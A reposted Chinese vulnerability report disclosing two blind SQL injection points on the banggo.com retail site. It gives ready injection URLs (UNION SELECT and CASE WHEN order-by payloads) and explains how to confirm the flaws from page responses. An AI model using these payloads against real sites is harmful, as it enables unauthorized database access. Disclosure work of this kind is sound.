来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 美特斯邦威官方商城某两处盲注详细说明:盲注一:http://www.banggo.com/Search.shtml?cid=1dis=[0-9.5]ad=155%20order%20by%2017%23http://www.banggo.com/Search.shtml?cid=1dis=[0-9.5]ad=155%20and%201=......
|
美特斯邦威官方商城某两处盲注
详细说明: 盲注一: http://www.banggo.com/Search.shtml?cid=1&dis=[0-9.5]&ad=155%20order%20by%2017%23 http://www.banggo.com/Search.shtml?cid=1&dis=[0-9.5]&ad=155%20and%201=2%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%23 可以试试输入不同的SQL语句来证明这是注入。。。正确的语句返回正常,错误的语句返回错误。 盲注二:www.2cto.com http://k.banggo.com/Child/playerlist.shtml?sort=(case when(1=1) then no else email end)%23 order by 注入 根据when 的条件和显示的排序结果来注入。   修复方案: 应该懂 作者kobin97 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
